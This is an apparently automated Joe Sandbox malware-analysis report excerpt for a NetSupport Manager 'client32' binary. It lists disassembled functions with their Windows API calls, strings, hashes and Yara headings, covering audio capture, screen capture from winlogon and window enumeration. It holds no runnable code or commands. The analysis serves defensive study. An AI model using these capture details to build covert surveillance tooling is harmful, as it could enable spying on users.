                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 111462CC
                                                                              • GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 111462D9
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 111462E6
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 111462F3
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 11146300
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 1114630D
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 1114631A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
                                                                              • String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
                                                                              • API String ID: 3896832720-3703587661
                                                                              • Opcode ID: 4a9ea036915f179722395e8dc0fd9ac4a12141907cda7860a4eb47a17f8f2bf1
                                                                              • Instruction ID: f57ee56c394f0cb9b00f8b4099bcc1512020c1dff5e65ba52801e9a68d189d03
                                                                              • Opcode Fuzzy Hash: 4a9ea036915f179722395e8dc0fd9ac4a12141907cda7860a4eb47a17f8f2bf1
                                                                              • Instruction Fuzzy Hash: 5A01827491123666CB157F7B9C98ECBFEBC9B8631CB814436F41493506D6B89004CF95
                                                                              Function 11052340 Relevance: 37.2, APIs: 11, Strings: 10, Instructions: 467windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 110523DB
                                                                              • _malloc.LIBCMT ref: 11052682
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • _memmove.LIBCMT ref: 110526A5
                                                                              • SendMessageTimeoutA.USER32(?,0000004A,00040270,?,00000002,00002710,00000000), ref: 11052706
                                                                              • _free.LIBCMT ref: 110523F9
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • Part of subcall function 1103ABC0: GetDateFormatA.KERNEL32(00000400,00000002,00000000,00000000,?,00000020,AB86ACF8,00000000,?,00000000,?,?,111806E1,000000FF,?,11052885), ref: 1103ABFF
                                                                                • Part of subcall function 1103ABC0: GetTimeFormatA.KERNEL32(00000400,00000002,00000000,00000000,?,00000010,?,11052885,?,?,?,000003EF,00000000), ref: 1103AC14
                                                                              • _malloc.LIBCMT ref: 1105241A
                                                                              • _memmove.LIBCMT ref: 11052430
                                                                              • GetTickCount.KERNEL32 ref: 11052438
                                                                              • IsWindow.USER32(?), ref: 11052528
                                                                              • _free.LIBCMT ref: 1105270D
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,000003EF,00000000,?,?,?,?,?,?,?,?), ref: 11052898
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$CountFormatHeapTick_malloc_memmove$AllocateDateErrorFileFreeLastMessageModuleNameSendTimeTimeoutWindow
                                                                              • String ID: Client$DisableMessage$IsA()$Message$Result of SendMessage %d$Send Message to StudentUI$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$pcicl32.dll$toastImageAndText.png$toastMessage.png
                                                                              • API String ID: 1763481038-1500001994
                                                                              • Opcode ID: a5af5c868cd9212a901ba32a44d68793f04b98350db216f2ee331afd3a23e179
                                                                              • Instruction ID: 6e38d2b6be998ee6d25296f6c7b4234716829dbcf4e7872d8ddccca2a3fd8e0b
                                                                              • Opcode Fuzzy Hash: a5af5c868cd9212a901ba32a44d68793f04b98350db216f2ee331afd3a23e179
                                                                              • Instruction Fuzzy Hash: 9112A174D0126ADFDB55DBA4CC98FDEB7B4AF58308F1041E8E419A7281EB70AA84CF51
                                                                              Function 1104A550 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 280COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                • Part of subcall function 11043660: SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 110436CA
                                                                                • Part of subcall function 11043660: GetWindowLongA.USER32(00000000,000000F0), ref: 110436D1
                                                                                • Part of subcall function 11043660: IsWindow.USER32(00000000), ref: 110436DE
                                                                                • Part of subcall function 11043660: GetWindowRect.USER32(00000000,1104A5A0), ref: 110436F5
                                                                              • GetCursorPos.USER32(?), ref: 1104A5B4
                                                                              • WindowFromPoint.USER32(?,?,?,00000000,00000000,00000000), ref: 1104A5DB
                                                                              • GetClassNameA.USER32(00000000,?,00000040), ref: 1104A5ED
                                                                              • WaitForInputIdle.USER32(00000000,000003E8), ref: 1104A708
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 1104A71B
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 1104A724
                                                                              • GetCursorPos.USER32(?), ref: 1104A72D
                                                                              • EnumWindows.USER32(11043760,?), ref: 1104A784
                                                                              • GetWindowRect.USER32(?,?), ref: 1104A7A0
                                                                              • WindowFromPoint.USER32(?,?,?,?,?,?,00000000,00000000,00000000), ref: 1104A7BA
                                                                              • GetClassNameA.USER32(00000000,?,00000040), ref: 1104A7C9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ClassCloseCursorFromHandleNamePointRect$EnumIdleInputLongMessageOpenSendVersionWaitWindows_memset_strncpy
                                                                              • String ID: "%sNSClientTB.exe"$'$*ExitMetroBreak$*ExitMetroCloseDelay$ActivateStui=%d, @%d,%d, actwin=%x [%s]$ActivateStui=-1, @%d,%d, actwin=%x [%s]$Client$NSMCoolbar
                                                                              • API String ID: 4093120923-2853765610
                                                                              • Opcode ID: f40f5608d2c4862867fda67a7de0564ca0eac3a5c4103e2191992e667f40a09e
                                                                              • Instruction ID: b95a4d6a995d07c4daa9ea7e2e674ddfb0ea67a82f84b5d3851b283388d8a07f
                                                                              • Opcode Fuzzy Hash: f40f5608d2c4862867fda67a7de0564ca0eac3a5c4103e2191992e667f40a09e
                                                                              • Instruction Fuzzy Hash: 7FA1B375E04269EFE720CFA0CCC5FAAB7B9EB49704F1001E9E51AA7680D7716A84CF51
                                                                              Function 1100C0F0 Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 332sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32(111EDE24), ref: 1100C10D
                                                                              • WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 1100C1D3
                                                                              • GetLastError.KERNEL32(?,?,00000000,?), ref: 1100C1E0
                                                                              • Sleep.KERNEL32(000003E8), ref: 1100C204
                                                                              • GetTickCount.KERNEL32 ref: 1100C24D
                                                                              • _free.LIBCMT ref: 1100C28A
                                                                                • Part of subcall function 1100B440: _malloc.LIBCMT ref: 1100B496
                                                                                • Part of subcall function 1100B440: EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,AB86ACF8,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                • Part of subcall function 1100B440: CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
                                                                                • Part of subcall function 1100B440: _calloc.LIBCMT ref: 1100B519
                                                                                • Part of subcall function 1100B440: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                                • Part of subcall function 1100B440: LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                              • _free.LIBCMT ref: 1100C411
                                                                              • GetTickCount.KERNEL32 ref: 1100C419
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,00000000,?), ref: 1100C435
                                                                              • waveInUnprepareHeader.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C442
                                                                              • waveInPrepareHeader.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C44F
                                                                              • waveInAddBuffer.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C45C
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?), ref: 1100C463
                                                                              • _free.LIBCMT ref: 1100C4C3
                                                                              • InterlockedDecrement.KERNEL32(111EDE24), ref: 1100C506
                                                                              Strings
                                                                              • Audio, xrefs: 1100C0FB
                                                                              • Audiothread stopped, threadcnt=%d, xrefs: 1100C513
                                                                              • Audiothread started, threadcnt=%d, xrefs: 1100C119
                                                                              • Vista AudioCap FreeInstance (pAudioCap=%p), xrefs: 1100C4E1
                                                                              • Error %d waiting for audio (nEvents=%d), xrefs: 1100C1F2
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$_freewave$CountCreateEnterHeaderInterlockedLeaveTick$BufferDecrementErrorEventFileIncrementLastMultipleObjectsPrepareSleepUnprepareWait_calloc_malloc
                                                                              • String ID: Audio$Audiothread started, threadcnt=%d$Audiothread stopped, threadcnt=%d$Error %d waiting for audio (nEvents=%d)$Vista AudioCap FreeInstance (pAudioCap=%p)
                                                                              • API String ID: 4143487924-3268596948
                                                                              • Opcode ID: 298505100148be32d1e9fec23b522e3c1f0abcd0da0ad9fbcc93395b7ec93c2b
                                                                              • Instruction ID: ce4536ffc1536091952ef6b0c0b09b4d7bc44372ab8792d62394f68665881c24
                                                                              • Opcode Fuzzy Hash: 298505100148be32d1e9fec23b522e3c1f0abcd0da0ad9fbcc93395b7ec93c2b
                                                                              • Instruction Fuzzy Hash: 66C1E774E00717ABF708CFB4C984BAEF7A4FF45348F1082A5E96996641EB30B951CB91
                                                                              Function 1105D240 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 124filewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenFileMappingA.KERNEL32(000F001F,00000000,-00000007), ref: 1105D277
                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
                                                                              • GetDC.USER32(00000000), ref: 1105D2BB
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
                                                                              • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 1105D300
                                                                              • GetTickCount.KERNEL32 ref: 1105D30F
                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
                                                                              • GetTickCount.KERNEL32 ref: 1105D33C
                                                                              • GetLastError.KERNEL32(?), ref: 1105D348
                                                                              • GdiFlush.GDI32 ref: 1105D35C
                                                                              • SelectObject.GDI32(00000000,?), ref: 1105D367
                                                                              • DeleteObject.GDI32(00000000), ref: 1105D36E
                                                                              • DeleteDC.GDI32(00000000), ref: 1105D378
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 1105D384
                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1105D396
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
                                                                              • String ID: /thumb:$Error %d blitting from winlogon, took %d ms$ThumbWL
                                                                              • API String ID: 652520247-4094952007
                                                                              • Opcode ID: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                              • Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
                                                                              • Opcode Fuzzy Hash: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                              • Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1
                                                                              Function 11134310 Relevance: 30.1, APIs: 2, Strings: 15, Instructions: 381COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __strdup_free
                                                                              • String ID: CheckRMLocation, SetChannel to [%s]$CheckRMLocation, check machine key$CheckRMLocation, check user key$CheckRMLocation, opened user key$CheckRMLocation, read [%s] from config$Client$Current Location$CurrentLocation$IsA()$RM user location=%s, assumed roaming$RoomSpec$SOFTWARE\RM\Connect$SOFTWARE\Research Machines\Network Management\Location Chooser$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$wwww
                                                                              • API String ID: 514621754-348489473
                                                                              • Opcode ID: 877a55279de5c964de4bb8d742acd01462f9f85157a0cf375f6da65e02bb0981
                                                                              • Instruction ID: c92d473af6dc16d9041c27a8538e010972664b76a85a87ccff2e3b1cf8fe9cea
                                                                              • Opcode Fuzzy Hash: 877a55279de5c964de4bb8d742acd01462f9f85157a0cf375f6da65e02bb0981
                                                                              • Instruction Fuzzy Hash: 1BD1E579E4061B9FDB05DFA4DC91FEDF371AF95348F108124E82277688EA31A905CBA1
                                                                              Function 111063A0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 183libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 111063D4
                                                                              • EnterCriticalSection.KERNEL32(111F160C,?,00000000), ref: 111063ED
                                                                              • GetTickCount.KERNEL32 ref: 111063F3
                                                                              • wsprintfA.USER32 ref: 1110645D
                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,?), ref: 1110649F
                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 11106520
                                                                              • SetLastError.KERNEL32(00000078), ref: 11106539
                                                                              • FreeLibrary.KERNEL32(00000000,?,00000010,00000000,00000000), ref: 1110656D
                                                                              • GetTickCount.KERNEL32 ref: 111065F7
                                                                              • LeaveCriticalSection.KERNEL32(111F160C,?,00000000), ref: 11106600
                                                                              Strings
                                                                              • Session\%u\NSMWClass, xrefs: 11106457
                                                                              • GetProcessId, xrefs: 11106518
                                                                              • Kernel32.dll, xrefs: 1110649A
                                                                              • PostMessage WMCLOSE to s%d (%d) ret %d, xrefs: 1110655B
                                                                              • Warning. took %d ms to get simap lock, xrefs: 11106403
                                                                              • Error. IPC(%s) = %s, xrefs: 1110648D
                                                                              • Warning. simap lock held for %d ms, xrefs: 11106614
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$CriticalLibrarySection$AddressEnterErrorFreeLastLeaveLoadProcwsprintf
                                                                              • String ID: Error. IPC(%s) = %s$GetProcessId$Kernel32.dll$PostMessage WMCLOSE to s%d (%d) ret %d$Session\%u\NSMWClass$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                              • API String ID: 3106348785-779848922
                                                                              • Opcode ID: 22985117de42114c4f55f01eabbacc0e62c5ae72103d16d90366e20abc0df78e
                                                                              • Instruction ID: 4e61fecc55a67ddd152895a92d9d18be16dde1e4b229261976b39b48e73fe7d6
                                                                              • Opcode Fuzzy Hash: 22985117de42114c4f55f01eabbacc0e62c5ae72103d16d90366e20abc0df78e
                                                                              • Instruction Fuzzy Hash: C4719FB5D012699FCB20DF65CD88A9EFBB4BB05304F6045E9D419A7605DB31AE80CF90
                                                                              Function 110EB540 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • wsprintfA.USER32 ref: 110EB5D8
                                                                              • GetTickCount.KERNEL32 ref: 110EB632
                                                                              • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB646
                                                                              • GetTickCount.KERNEL32 ref: 110EB64E
                                                                              • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
                                                                              • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
                                                                              • SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 110EB6DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
